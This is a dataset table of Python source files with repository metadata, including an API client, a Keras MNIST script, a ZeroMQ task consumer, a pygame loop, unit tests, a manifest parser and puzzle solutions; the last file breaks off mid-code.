| hexsha (stringlengths 40-40) | size (int64 5-2.06M) | ext (stringclasses 10 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 3-248) | max_stars_repo_name (stringlengths 5-125) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64 1-191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 3-248) | max_issues_repo_name (stringlengths 5-125) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64 1-67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 3-248) | max_forks_repo_name (stringlengths 5-125) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | content (stringlengths 5-2.06M) | avg_line_length (float64 1-1.02M) | max_line_length (int64 3-1.03M) | alphanum_fraction (float64 0-1) | count_classes (int64 0-1.6M) | score_classes (float64 0-1) | count_generators (int64 0-651k) | score_generators (float64 0-1) | count_decorators (int64 0-990k) | score_decorators (float64 0-1) | count_async_functions (int64 0-235k) | score_async_functions (float64 0-1) | count_documentation (int64 0-1.04M) | score_documentation (float64 0-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b156849efe28743e1f59dbcfbfb3f32c4319b8b3 | 2,718 | py | Python | gecko/classes/api_handler.py | paulschick/Coingecko-Crypto-Price-API | c712856bf423a6d1d429a35c8a8e01bb983ec7ff | ["MIT"] | 2 | 2022-01-18T18:09:31.000Z | 2022-02-28T01:01:45.000Z | gecko/classes/api_handler.py | paulschick/Coingecko-Crypto-Price-API | c712856bf423a6d1d429a35c8a8e01bb983ec7ff | ["MIT"] | null | null | null | gecko/classes/api_handler.py | paulschick/Coingecko-Crypto-Price-API | c712856bf423a6d1d429a35c8a8e01bb983ec7ff | ["MIT"] | null | null | null |
import aiohttp
from aiohttp import ClientConnectionError, ClientResponseError
from .models import CoinsResponse, SimplePriceResponse
from .configs import Config
from typing import List, Dict, Union
class APIHandler:
def __init__(self):
self._config: Config = Config()
async def get_supported_coins(self) -> List[CoinsResponse]:
uri: str = self._config.coins_list_uri
async with aiohttp.ClientSession() as session:
async with session.get(uri) as resp:
try:
res: List[Dict[str, str]] = await resp.json()
res_instances: List[CoinsResponse] = list()
for coin in res:
instance: CoinsResponse = CoinsResponse(
id=coin.get('id', ''),
symbol=coin.get('symbol', ''),
name=coin.get('name', '')
)
res_instances.append(instance)
return res_instances
except (
ClientConnectionError, ClientResponseError,
Exception
) as e:
print(f'Exception from API: {type(e).__name__}')
raise e
async def get_simple_price(self, currencies: List[str]) -> Union[List[SimplePriceResponse], None]:
uri: str = self._config.simple_price_uri(currencies)
async with aiohttp.ClientSession() as session:
async with session.get(uri) as resp:
try:
res: Union[Dict, None] = await resp.json()
if res.get('error', None) is not None:
msg = res['error']
raise Exception(msg)
except (
ClientConnectionError, ClientResponseError,
Exception
) as e:
print(f'Exception from API: {type(e).__name__}')
raise e
if type(res) is dict:
responses: List[SimplePriceResponse] = list()
for k, v in res.items():
_id = k
currency_key_list = list(v.keys())
curr = currency_key_list[0]
value = v[curr]
price_response = SimplePriceResponse(
id=_id,
quote=curr,
price=value
)
responses.append(price_response)
return responses
else:
return None
| 41.181818 | 102 | 0.472774 | 2,517 | 0.926049 | 0 | 0 | 0 | 0 | 2,424 | 0.891832 | 120 | 0.04415 |
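The two coroutines in the APIHandler above need an event loop to run; below is a minimal driver sketch, assuming the gecko.classes package layout from this row's path and a Config that resolves the CoinGecko endpoints. The driver itself is not part of the dataset row.

import asyncio

from gecko.classes.api_handler import APIHandler

async def main() -> None:
    handler = APIHandler()
    coins = await handler.get_supported_coins()       # List[CoinsResponse]
    print(f'{len(coins)} supported coins')
    prices = await handler.get_simple_price(['usd'])  # List[SimplePriceResponse] or None
    if prices is not None:
        for p in prices[:5]:
            print(p.id, p.quote, p.price)

if __name__ == '__main__':
    asyncio.run(main())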
b156a941a513ed31187d8dbd1191f683290ef317 | 1,497 | py | Python | Hello-Cifar-10/keras.py | PyTorchLightning/grid-tutorials | a45ec1bed374660b5a423d096945e462b3241efc | ["Apache-2.0"] | null | null | null | Hello-Cifar-10/keras.py | PyTorchLightning/grid-tutorials | a45ec1bed374660b5a423d096945e462b3241efc | ["Apache-2.0"] | null | null | null | Hello-Cifar-10/keras.py | PyTorchLightning/grid-tutorials | a45ec1bed374660b5a423d096945e462b3241efc | ["Apache-2.0"] | null | null | null |
from argparse import ArgumentParser
from pathlib import Path
from tensorflow import keras
# Define this script's flags
parser = ArgumentParser()
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--max_epochs', type=int, default=5)
parser.add_argument('--data_dir', type=str, default="./data/")
args = parser.parse_args()
# Make sure data_dir is absolute + create it if it doesn't exist
data_dir = Path(args.data_dir).absolute()
data_dir.mkdir(parents=True, exist_ok=True)
# Download and/or load data from disk
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data(data_dir / 'mnist.npz')
# Standardize X's to be between 0.0-1.0 instead of 0-255
x_train, x_test = x_train.astype("float32") / 255, x_test.astype("float32") / 255
# Build Model
model = keras.models.Sequential(
[
        keras.layers.Flatten(input_shape=(28, 28)),  # mnist.load_data yields (28, 28) arrays; no channel axis is added above
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax'),
]
)
# Compile
model.compile(
optimizer=keras.optimizers.Adam(learning_rate=args.lr),
loss="sparse_categorical_crossentropy",
metrics=["sparse_categorical_accuracy"],
)
# Train
history = model.fit(
x_train,
y_train,
batch_size=args.batch_size,
epochs=args.max_epochs,
validation_split=0.1,
callbacks=[keras.callbacks.TensorBoard(log_dir='./lightning_logs/keras')],
)
# Evaluate
model.evaluate(x_test, y_test)
| 28.788462 | 93 | 0.725451 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 409 | 0.273213 |
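One small refinement worth noting for the script above: model.evaluate returns the loss plus each compiled metric (here just sparse_categorical_accuracy), so the final line can capture them instead of discarding them. A sketch:

# Variant of the script's last line: keep the test metrics.
test_loss, test_acc = model.evaluate(x_test, y_test, verbose=0)
print(f"test loss {test_loss:.4f}, test accuracy {test_acc:.4f}")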
b15750ce5aef5b54cce96688ad262cadc96dc7f8 | 4,432 | py | Python | src/taskmaster/client.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | ["Apache-2.0"] | 2 | 2015-11-08T12:45:38.000Z | 2017-06-03T09:16:16.000Z | src/taskmaster/client.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | ["Apache-2.0"] | null | null | null | src/taskmaster/client.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | ["Apache-2.0"] | null | null | null |
"""
taskmaster.client
~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import cPickle as pickle
import gevent
from gevent_zeromq import zmq
from gevent.queue import Queue
from taskmaster.util import import_target
class Worker(object):
def __init__(self, consumer, target):
self.consumer = consumer
self.target = target
def run(self):
self.started = True
while self.started:
gevent.sleep(0)
try:
job_id, job = self.consumer.get_job()
self.target(job)
except KeyboardInterrupt:
return
finally:
self.consumer.task_done()
class Client(object):
def __init__(self, address, timeout=2500, retries=3):
self.address = address
self.timeout = timeout
self.retries = retries
self.context = zmq.Context(1)
self.poller = zmq.Poller()
self.client = None
def reconnect(self):
if self.client:
self.poller.unregister(self.client)
self.client.close()
print "Reconnecting to server on %r" % self.address
else:
print "Connecting to server on %r" % self.address
self.client = self.context.socket(zmq.REQ)
self.client.setsockopt(zmq.LINGER, 0)
self.client.connect(self.address)
self.poller.register(self.client, zmq.POLLIN)
def send(self, cmd, data=''):
request = [cmd, data]
retries = self.retries
reply = None
while retries > 0:
gevent.sleep(0)
self.client.send_multipart(request)
try:
items = self.poller.poll(self.timeout)
except KeyboardInterrupt:
break # interrupted
if items:
reply = self.recv()
break
else:
if retries:
self.reconnect()
else:
break
retries -= 1
return reply
def recv(self):
reply = self.client.recv_multipart()
assert len(reply) == 2
return reply
def destroy(self):
if self.client:
self.poller.unregister(self.client)
self.client.setsockopt(zmq.LINGER, 0)
self.client.close()
self.context.destroy()
class Consumer(object):
def __init__(self, client, target, progressbar=True):
if isinstance(target, basestring):
target = import_target(target, 'handle_job')
self.client = client
self.target = target
self.queue = Queue(maxsize=1)
if progressbar:
self.pbar = self.get_progressbar()
else:
self.pbar = None
self._wants_job = False
def get_progressbar(self):
from taskmaster.progressbar import Counter, Speed, Timer, ProgressBar, UnknownLength
widgets = ['Tasks Completed: ', Counter(), ' | ', Speed(), ' | ', Timer()]
pbar = ProgressBar(widgets=widgets, maxval=UnknownLength)
return pbar
def get_job(self):
self._wants_job = True
return self.queue.get()
def task_done(self):
if self.pbar:
self.pbar.update(self.tasks_completed)
self.tasks_completed += 1
# self.client.send('DONE')
def start(self):
self.started = True
self.tasks_completed = 0
self.client.reconnect()
worker = Worker(self, self.target)
gevent.spawn(worker.run)
if self.pbar:
self.pbar.start()
while self.started:
gevent.sleep(0)
# If the queue has items in it, we just loop
if not self._wants_job:
continue
reply = self.client.send('GET')
if not reply:
break
cmd, data = reply
# Reply can be "WAIT", "OK", or "ERROR"
if cmd == 'OK':
self._wants_job = False
job = pickle.loads(data)
self.queue.put(job)
elif cmd == 'QUIT':
break
self.shutdown()
def shutdown(self):
if not self.started:
return
self.started = False
if self.pbar:
self.pbar.finish()
self.client.destroy()
| 25.181818 | 92 | 0.54287 | 4,142 | 0.934567 | 0 | 0 | 0 | 0 | 0 | 0 | 375 | 0.084612 |
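A minimal wiring sketch for the Client and Consumer classes above, in the same Python 2 dialect as the module; the address and the handle_job callback are illustrative, and a taskmaster server answering the GET/OK/WAIT/QUIT protocol shown above is assumed to be listening.

from taskmaster.client import Client, Consumer

def handle_job(job):
    print "processing %r" % (job,)

client = Client('tcp://localhost:3050', timeout=2500, retries=3)
consumer = Consumer(client, handle_job, progressbar=False)
consumer.start()  # blocks until the server sends QUIT or stops answering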
b1587cfb5054c54695ad8b82700668819e284945 | 3,165 | py | Python | src/loop.py | migueldingli1997/PySnake | b9b7e98651b207f7bf846cd951b4bb4ee3bba426 | ["Apache-2.0"] | 2 | 2020-03-06T09:09:00.000Z | 2022-01-12T14:29:51.000Z | src/loop.py | migueldingli1997/PySnake | b9b7e98651b207f7bf846cd951b4bb4ee3bba426 | ["Apache-2.0"] | 20 | 2020-02-09T16:42:53.000Z | 2020-03-07T18:47:35.000Z | src/loop.py | migueldingli1997/PySnake | b9b7e98651b207f7bf846cd951b4bb4ee3bba426 | ["Apache-2.0"] | null | null | null |
import pygame as pg
from pygame.time import Clock
from src.drawer import Drawer
from src.game import Game
from src.utils.config import Config
from src.utils.score import ScoresList
from src.utils.sfx import SfxHolder
from src.utils.text import Text
from src.utils.util import Util, user_quit
class Loop:
def __init__(self, util: Util, cfg: Config, sfx: SfxHolder, txt: Text,
drawer: Drawer):
self.util = util
self.cfg = cfg
self.sfx = sfx
self.txt = txt
self.drawer = drawer
self.clock = Clock()
def main(self, screen, game: Game) -> bool:
# Dump first tick to ignore past
self.clock.tick(self.cfg.frames_per_second)
while True:
# Get change in time
dt = self.clock.tick(self.cfg.frames_per_second)
# Loop over events (quit, key down, key up)
for event in pg.event.get():
if user_quit(event):
return False
elif event.type == pg.KEYDOWN:
if event.key in self.cfg.all_keys:
game.press_key(event.key)
elif event.type == pg.KEYUP:
if event.key in self.cfg.all_keys:
game.release_key(event.key)
# Move and draw game (with possible paused screen and fps)
if not game.paused:
game.move(dt)
if not game.game_over:
self.drawer.draw_game(screen, game, dt)
if game.paused:
self.drawer.draw_paused_overlay(screen)
if self.cfg.draw_fps:
self.drawer.draw_fps(screen, self.clock.get_fps())
# Update display
pg.display.update()
# Break if game no longer running
if game.game_over:
return True
def game_over(self, screen, game: Game, scores: ScoresList) -> bool:
score_saved = False # not saved yet
self.sfx.game_over.play() # play audio
i = 0
while True:
# Fade-in game over screen
if i < 256:
pg.event.get() # dummy get
self.drawer.draw_game(screen, game, 0) # draw game
self.drawer.draw_game_over_overlay(
screen, i, score_saved) # fade-in game over screen
self.clock.tick(60) # slow-down the fade-in
# Refresh screen
pg.display.flip()
i += 1
# Check for quit or restart events
for event in pg.event.get():
if user_quit(event):
return False
elif event.type == pg.MOUSEBUTTONDOWN:
if self.txt.restart_rect.collidepoint(*event.pos):
return True
elif not score_saved and \
self.txt.save_score_rect.collidepoint(*event.pos):
for score in game.get_scores():
scores.add_score(score)
scores.write()
score_saved = True
| 35.166667 | 78 | 0.529226 | 2,869 | 0.906477 | 0 | 0 | 0 | 0 | 0 | 0 | 376 | 0.118799 |
b15a0f38860998844631ced61f5490b9a9898c55 | 7,135 | py | Python | tests/test_detectCompileCommand.py | langrind/ccjtools | 6f92d8cadf24d6e1f26e984df3c11b4d58061053 | ["MIT"] | null | null | null | tests/test_detectCompileCommand.py | langrind/ccjtools | 6f92d8cadf24d6e1f26e984df3c11b4d58061053 | ["MIT"] | null | null | null | tests/test_detectCompileCommand.py | langrind/ccjtools | 6f92d8cadf24d6e1f26e984df3c11b4d58061053 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
from ccjtools import ccj_make
def test_detectExactSpecifiedCompilerCommandWord():
"""Using -c option, check that the exact word is recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName, '-c', 'mastadon'])
if not parsedArgs:
assert False
# Note that we are basically testing "strcmp()" here. A different test is used
# to check a whole line of input
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "Mastadon"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "astadon"):
assert False
assert True
def test_detectCompilerWord():
"""Not using -c option, check that plausible compiler commands are recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName])
if not parsedArgs:
assert False
# Note that we are basically testing a regexp single-word match. A different test
# is used to check a whole line of input
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon-gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "Mastadon-c++"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "c++"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "g++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon"):
assert False
assert True
def test_detectExactSpecifiedCompilerCommand():
"""Using -c option, check that lines are recognized correctly"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName, '-c', 'mastadon'])
if not parsedArgs:
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadons are not bluefish -Itheentireseas"):
assert False
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon are not bluefish -Itheentireseas"):
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon-gcc mastadon.c -D_THIS_ -D_THAT_ -fno-dependent-clauses-or-santa-clauses-either"):
assert False
bigString = "/opt/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-g++ -DCONFIG_ARCH_BOARD_PX4_FMU_V5 -D__CUSTOM_FILE_IO__ -D__DF_NUTTX -D__PX4_NUTTX -D__STDC_FORMAT_MACROS -isystem ../../platforms/nuttx/NuttX/include/cxx -isystem NuttX/nuttx/include/cxx -isystem NuttX/nuttx/include -I../../boards/px4/fmu-v5/src -I../../platforms/nuttx/src/px4/common/include -I. -Isrc -Isrc/lib -Isrc/modules -I../../platforms/nuttx/src/px4/stm/stm32f7/include -I../../platforms/common/include -I../../src -I../../src/include -I../../src/lib -I../../src/lib/DriverFramework/framework/include -I../../src/lib/matrix -I../../src/modules -I../../src/platforms -INuttX/nuttx/arch/arm/src/armv7-m -INuttX/nuttx/arch/arm/src/chip -INuttX/nuttx/arch/arm/src/common -INuttX/apps/include -mcpu=cortex-m7 -mthumb -mfpu=fpv5-d16 -mfloat-abi=hard -Os -DNDEBUG -g -fdata-sections -ffunction-sections -fomit-frame-pointer -fmerge-all-constants -fno-signed-zeros -fno-trapping-math -freciprocal-math -fno-math-errno -fno-strict-aliasing -fvisibility=hidden -include visibility.h -Wall -Wextra -Werror -Warray-bounds -Wcast-align -Wdisabled-optimization -Wdouble-promotion -Wfatal-errors -Wfloat-equal -Wformat-security -Winit-self -Wlogical-op -Wpointer-arith -Wshadow -Wuninitialized -Wunknown-pragmas -Wunused-variable -Wno-missing-field-initializers -Wno-missing-include-dirs -Wno-unused-parameter -fdiagnostics-color=always -fno-builtin-printf -fno-strength-reduce -Wformat=1 -Wunused-but-set-variable -Wno-format-truncation -fcheck-new -fno-exceptions -fno-rtti -fno-threadsafe-statics -Wreorder -Wno-overloaded-virtual -nostdinc++ -std=gnu++11 -o msg/CMakeFiles/uorb_msgs.dir/topics_sources/uORBTopics.cpp.obj -c /home/langrind/Firmware/build/px4_fmu-v5_multicopter/msg/topics_sources/uORBTopics.cpp"
if ccj_make.mkccj_process_line(parsedArgs, {}, [], bigString):
assert False
assert True
def test_detectCompilerCommandLine():
"""Not using -c option, check that plausible compiler command lines are recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName])
if not parsedArgs:
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadons are not bluefish -Itheentireseas"):
assert False
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon-gcc mastadon.c -D_THIS_ -D_THAT_ -fno-dependent-clauses-or-santa-clauses-either"):
assert False
bigString = "/opt/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-g++ -DCONFIG_ARCH_BOARD_PX4_FMU_V5 -D__CUSTOM_FILE_IO__ -D__DF_NUTTX -D__PX4_NUTTX -D__STDC_FORMAT_MACROS -isystem ../../platforms/nuttx/NuttX/include/cxx -isystem NuttX/nuttx/include/cxx -isystem NuttX/nuttx/include -I../../boards/px4/fmu-v5/src -I../../platforms/nuttx/src/px4/common/include -I. -Isrc -Isrc/lib -Isrc/modules -I../../platforms/nuttx/src/px4/stm/stm32f7/include -I../../platforms/common/include -I../../src -I../../src/include -I../../src/lib -I../../src/lib/DriverFramework/framework/include -I../../src/lib/matrix -I../../src/modules -I../../src/platforms -INuttX/nuttx/arch/arm/src/armv7-m -INuttX/nuttx/arch/arm/src/chip -INuttX/nuttx/arch/arm/src/common -INuttX/apps/include -mcpu=cortex-m7 -mthumb -mfpu=fpv5-d16 -mfloat-abi=hard -Os -DNDEBUG -g -fdata-sections -ffunction-sections -fomit-frame-pointer -fmerge-all-constants -fno-signed-zeros -fno-trapping-math -freciprocal-math -fno-math-errno -fno-strict-aliasing -fvisibility=hidden -include visibility.h -Wall -Wextra -Werror -Warray-bounds -Wcast-align -Wdisabled-optimization -Wdouble-promotion -Wfatal-errors -Wfloat-equal -Wformat-security -Winit-self -Wlogical-op -Wpointer-arith -Wshadow -Wuninitialized -Wunknown-pragmas -Wunused-variable -Wno-missing-field-initializers -Wno-missing-include-dirs -Wno-unused-parameter -fdiagnostics-color=always -fno-builtin-printf -fno-strength-reduce -Wformat=1 -Wunused-but-set-variable -Wno-format-truncation -fcheck-new -fno-exceptions -fno-rtti -fno-threadsafe-statics -Wreorder -Wno-overloaded-virtual -nostdinc++ -std=gnu++11 -o msg/CMakeFiles/uorb_msgs.dir/topics_sources/uORBTopics.cpp.obj -c /home/langrind/Firmware/build/px4_fmu-v5_multicopter/msg/topics_sources/uORBTopics.cpp"
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], bigString):
assert False
assert True
| 62.043478 | 1,789 | 0.737211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,618 | 0.647232 |
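The file above follows pytest conventions (test_* function names, bare asserts), so with ccjtools installed it runs directly; a hypothetical invocation from the repository root:

# pytest tests/test_detectCompileCommand.py -q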
b15a35bd4f1abd5ba27c131e3166d2cc71012e7c | 748 | py | Python | Medium/valid-ip-addresses.py | SaumyaRai2010/algoexpert-data-structures-algorithms | bcafd8d7798661bf86c2d6234221d764c68fc19f | ["MIT"] | 152 | 2021-07-15T02:56:17.000Z | 2022-03-31T08:59:52.000Z | Medium/valid-ip-addresses.py | deepakgarg08/algoexpert-data-structures-algorithms | 2264802bce971e842c616b1eaf9238639d73915f | ["MIT"] | 2 | 2021-07-18T22:01:28.000Z | 2022-02-17T03:55:04.000Z | Medium/valid-ip-addresses.py | deepakgarg08/algoexpert-data-structures-algorithms | 2264802bce971e842c616b1eaf9238639d73915f | ["MIT"] | 74 | 2021-07-16T11:55:30.000Z | 2022-03-31T14:48:06.000Z |
# VALID IP ADDRESSES
# O(1) time and space
def validIPAddresses(string):
# Write your code here.
validIPAddresses = []
if len(string) < 4:
return []
for i in range(3):
if not isValidPart(string[:i+1]):
continue
for j in range(i+1, i+4):
if not isValidPart(string[i+1:j+1]):
continue
for k in range(j+1, j+4):
if not isValidPart(string[j+1:k+1]) or not isValidPart(string[k+1:]):
continue
validIP = string[:i+1] + "." + string[i+1:j+1] + "." + string[j+1:k+1] + "." + string[k+1:]
validIPAddresses.append(validIP)
return validIPAddresses
def isValidPart(string):
if len(string) == 1:
return True
if not 0 < len(string) < 4 or string[0] == "0":
return False
return 0 <= int(string) <= 255
| 24.933333 | 95 | 0.620321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.101604 |
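A quick usage sketch for validIPAddresses above (the input is assumed to be a digits-only string, as in the problem statement):

# Enumerate every placement of three dots that yields four valid octets.
for ip in validIPAddresses("1921680"):
    print(ip)
# "1.92.168.0" and "192.16.8.0" are among the printed results.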
b15acd6c26c6ac380b78b3c4621e284328ee4d9a | 1,999 | py | Python | resnet152/configs.py | LiuHao-THU/frame2d | c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b | ["Apache-2.0"] | 1 | 2020-05-15T03:28:53.000Z | 2020-05-15T03:28:53.000Z | resnet152/configs.py | LiuHao-THU/frame2d | c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b | ["Apache-2.0"] | null | null | null | resnet152/configs.py | LiuHao-THU/frame2d | c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b | ["Apache-2.0"] | null | null | null |
"""
this .py file contains all the parameters
"""
import os
configs = {}
main_dir = 'frame_vessel/resnet152'
#****************************************read data parameters**************************************
configs['max_angle'] = 20
configs['root_dir'] = 'data'
configs['save_dir'] = 'saved_data'
configs['image_size'] = 224
configs['per'] = 0.9  # percentage split off from the raw data for training
configs['saved_npy'] = True
configs['imgs_train'] = 'imgs_train.npy'
configs['imgs_label'] = 'imgs_label.npy'
configs['imgs_train_test'] = 'imgs_train_test.npy'
configs['imgs_label_test'] = 'imgs_label_test.npy'
configs['model_path'] = 'frame_vessel/pretrain_model/resnet/resnet152.npy'
#**************************************argumentation parameters************************************
configs['raw_images'] = True
configs['horizontal_flip_num'] = False
configs['vertical_flip_num'] = False
configs['random_rotate_num'] = 1
configs['random_crop_num'] = 1
configs['center_crop_num'] = 0
configs['slide_crop_num'] = 0
configs['slide_crop_old_num'] = 0
#*************************************train parameters**********************************************
configs['image_size'] = 224
# configs['channel'] = 3
configs['channel'] = 3
configs["batch_size"] = 8
configs['epoch'] = 20
configs['final_layer_type'] = "softmax_sparse"
configs['learning_rate_orig'] = 1e-3
configs['checkpoint_dir'] = main_dir+ '/check_points'
configs['num_classes'] = 3
configs['VGG_MEAN'] = [1.030626238009759419e+02, 1.159028825738600261e+02, 1.231516308384586438e+02]
configs['_BATCH_NORM_DECAY'] = 0.997
configs['_BATCH_NORM_EPSILON'] = 1e-5
#************************************device parameters**********************************************
configs["num_gpus"] = 1
configs["dev"] = '/gpu:0' #'/cpu:0'
# configs["dev"] = '/cpu:0' #'/cpu:0'
configs['GPU'] = '0'
#************************************evaluate parameters********************************************
| 39.98 | 101 | 0.561281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,321 | 0.66083 |
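A sketch of how a configs module like the one above is typically consumed elsewhere in the project; the importing code is hypothetical, but the keys and values are the ones defined above.

from configs import configs

batch_size = configs["batch_size"]    # 8
lr = configs["learning_rate_orig"]    # 1e-3
ckpt = configs["checkpoint_dir"]      # 'frame_vessel/resnet152/check_points'
print(batch_size, lr, ckpt)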
b15c81d9f33f129ae3eb078cb489fe17c6a3fe71 | 2,707 | py | Python | src/packagedcode/windows.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | ["Apache-2.0", "CC-BY-4.0"] | 1,511 | 2015-07-01T15:29:03.000Z | 2022-03-30T13:40:05.000Z | src/packagedcode/windows.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | ["Apache-2.0", "CC-BY-4.0"] | 2,695 | 2015-07-01T16:01:35.000Z | 2022-03-31T19:17:44.000Z | src/packagedcode/windows.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | ["Apache-2.0", "CC-BY-4.0"] | 540 | 2015-07-01T15:08:19.000Z | 2022-03-31T12:13:11.000Z |
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import attr
import xmltodict
from packagedcode import models
from commoncode import filetype
# Tracing flags
TRACE = False
def logger_debug(*args):
pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, str) and a or repr(a) for a in args))
@attr.s()
class MicrosoftUpdatePackage(models.Package, models.PackageManifest):
extensions = ('.mum',)
filetypes = ('xml 1.0 document',)
mimetypes = ('text/xml',)
default_type = 'windows-update'
@attr.s()
class MicrosoftUpdateManifest(MicrosoftUpdatePackage, models.PackageManifest):
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return filetype.is_file(location) and location.endswith('.mum')
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
        with open(location, 'rb') as loc:
parsed = xmltodict.parse(loc)
if TRACE:
logger_debug('parsed:', parsed)
if not parsed:
return
assembly = parsed.get('assembly', {})
description = assembly.get('@description', '')
company = assembly.get('@company', '')
copyright = assembly.get('@copyright', '')
support_url = assembly.get('@supportInformation', '')
assembly_identity = assembly.get('assemblyIdentity', {})
name = assembly_identity.get('@name', '')
version = assembly_identity.get('@version', '')
parties = []
if company:
parties.append(
models.Party(
name=company,
type=models.party_org,
role='owner',
)
)
yield cls(
name=name,
version=version,
description=description,
homepage_url=support_url,
parties=parties,
copyright=copyright,
)
| 27.622449 | 90 | 0.615441 | 1,811 | 0.669006 | 1,276 | 0.471371 | 1,831 | 0.676395 | 0 | 0 | 868 | 0.32065 |
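A driver sketch for MicrosoftUpdateManifest.recognize above. The .mum file shape is inferred from the @-attribute lookups in the parser, not from a Microsoft spec, so treat both the XML and the file name as illustrative.

# Hypothetical .mum content matching the fields recognize() reads.
MUM = '''<?xml version="1.0" encoding="utf-8"?>
<assembly description="Example update" company="Example Corp"
          copyright="(c) Example Corp" supportInformation="https://example.com/support">
  <assemblyIdentity name="Example-Package" version="10.0.1.2"/>
</assembly>'''

with open('example.mum', 'w') as f:
    f.write(MUM)

for package in MicrosoftUpdateManifest.recognize('example.mum'):
    print(package.name, package.version, package.homepage_url)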
b15cd11eeded0e97332a28f0cc409f651b2843ff | 988 | py | Python | day-21/main.py | jmolinski/advent-of-code-2018 | 96bad97d6523bc99d63c86bbff6b13602952a91d | ["MIT"] | 2 | 2018-12-16T20:48:52.000Z | 2021-03-28T15:07:51.000Z | day-21/main.py | jmolinski/advent-of-code-2018 | 96bad97d6523bc99d63c86bbff6b13602952a91d | ["MIT"] | null | null | null | day-21/main.py | jmolinski/advent-of-code-2018 | 96bad97d6523bc99d63c86bbff6b13602952a91d | ["MIT"] | 1 | 2018-12-02T13:36:24.000Z | 2018-12-02T13:36:24.000Z |
# decompiled-by-hand & optimized
# definitely not gonna refactor this one
# 0.18s on pypy3
ip_reg = 4
reg = [0, 0, 0, 0, 0, 0]
i = 0
seen = set()
lst = []
while True:
i += 1
break_true = False
while True:
if break_true:
if i == 1:
print("1)", reg[1])
if reg[1] in seen:
if len(lst) == 25000:
p2 = max(seen, key=lambda x: lst.index(x))
print("2)", p2)
exit()
seen.add(reg[1])
lst.append(reg[1])
break
reg[2] = reg[1] | 65536 # 6
